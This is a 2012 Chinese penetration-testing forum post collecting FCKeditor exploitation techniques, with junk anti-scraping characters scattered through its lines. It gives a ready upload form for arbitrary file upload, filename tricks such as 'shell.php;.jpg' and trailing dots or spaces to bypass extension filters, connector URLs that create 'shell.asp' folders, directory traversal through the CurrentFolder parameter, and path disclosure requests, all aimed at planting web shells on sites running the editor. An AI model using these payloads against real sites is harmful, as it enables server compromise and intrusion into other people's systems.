中国网络渗透测试联盟

标题: FCKeditor漏洞利用总结 [打印本页]

作者: 荒村狂客    时间: 2012-9-5 20:23
标题: FCKeditor漏洞利用总结
Fckeditor漏洞利用总结

查看编辑器版本3 C/ H9 G% J" b6 J& y! z
FCKeditor/_whatsnew.html, _: ]$ s6 P2 a1 u( G
—————————————————————————————————————————————————————————————

2. Version 2.2 版本# N' o" Z+ [% ]  V; J9 C" |
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
- @: a% f$ t8 i4 l—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
% ^2 z8 i6 M  j+ j: T9 O<form id="frmUpload" enctype="multipart/form-data"# k6 }  |. M# L! _
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>  `$ Y; n) B( S0 y5 b
<input type="file" name="NewFile" size="50"><br>
5 Z; D" _# {% k: Q% a) [4 g3 L<input id="btnUpload" type="submit" value="Upload">; W1 A  ?8 M, k5 y  W
</form>
+ o. M5 D2 @$ U  Q8 J$ q—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
" s& {9 Z: \* G8 o! U3 I        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。$ x2 Q( [% ~8 a+ B* X  X* Y1 m
    4.1:提交shell.php+空格绕过
, ^' C. |* Y! ~/ V不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
# n# Y. n3 u, r+ W1 }* Z( l    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。$ g4 I. W3 n& }/ }/ U2 I
—————————————————————————————————————————————————————————————

5. 突破建立文件夹
' k* X# b9 @4 [4 w/ d( xFCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684/ v  g9 ~& v; m* y0 t
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
" C  K0 z- B; h- x1 I5 z) }/ v—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址
/ U% }, G3 z4 H4 g5 |; z1 [FCKeditor/editor/filemanager/browser/default/connectors/test.html
' e/ _7 n. K; j7 A* V3 ]- [5 ?FCKeditor/editor/filemanager/upload/test.html
) }& P1 `0 P) f2 KFCKeditor/editor/filemanager/connectors/test.html
! N4 K  i6 h/ }' F! _FCKeditor/editor/filemanager/connectors/uploadtest.html
2 C* Q! w) s4 y- z—————————————————————————————————————————————————————————————
& }8 j) a& a' y

7.常用上传地址/ c" K# B& a3 t# {- g6 e
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/; d% r( B1 {; t& ]( a' S& ~
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp1 F& q9 K+ N6 V) Z  R$ d, c" `
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
8 W  M* x0 y+ nJSP 版:( h# J) O) T9 A3 S' u
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
# M1 |! M% ~' F7 E1 h6 k注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
7 g+ ~) Z- }1 b  r$ I# c# O件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。! F2 C6 N) }+ n) f
—————————————————————————————————————————————————————————————

8.其他上传地址
( K7 _2 i" E* ~- s' w8 tFCKeditor/_samples/default.html
! o2 @" }. x3 {5 l* d, V5 MFCKeditor/_samples/asp/sample01.asp
, i6 M4 v" b! }0 oFCKeditor/_samples/asp/sample02.asp# y1 }! t1 x: h
FCKeditor/_samples/asp/sample03.asp; ?- ^$ D+ s4 K7 J3 u2 N
FCKeditor/_samples/asp/sample04.asp
; @  f/ [  Z7 H& w! I$ I0 C一般很多站点都已删除_samples 目录,可以试试。4 @# `  n0 T/ v% ~. @/ L
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
; f% l7 g2 u: w+ ]; Q0 x—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址
+ d6 |: f7 Y) @Version 2.4.1 测试通过
- b4 j% {2 J) Q" s  _修改CurrentFolder 参数使用 ../../来进入不同的目录$ C8 K" r; g6 X; C7 T
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp$ L" ?, {: \+ ]+ o! w7 k- h6 \
根据返回的XML 信息可以查看网站所有的目录。: n# V7 _0 r- S7 G/ J+ _' B% {
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
% ^5 K8 Y3 ^# ?8 N" D: b也可以直接浏览盘符:
$ D, F( `9 S+ M( Q. z4 jJSP 版本:6 W/ S/ }2 G$ g/ C' u
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
+ L8 L$ h8 P( f% a; X$ K—————————————————————————————————————————————————————————————

10.爆路径漏洞
5 x" _: d6 {( ?" \! XFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
7 ~  S3 ~' V0 m$ Z—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题
6 O/ N$ |) h0 S: V6 W        影响版本: FCKeditor x.x <= FCKeditor v2.4.3# J1 l7 R( U/ L* u- \, M. E% A2 y
脆弱描述:
% [, t; t+ b7 g( sFCKeditor v2.4.3 中File 类别默认拒绝上传类型:, ~3 J$ U: t7 \
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
/ M6 g! ]& k1 f: p/ f9 @+ X( a" IFckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!( g/ }) K* S  N: I4 [6 o6 d
        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
3 s1 U3 k9 B% ]" S# Z        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!


作者: admin    时间: 2012-9-8 22:43
[attach]41[/attach]




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2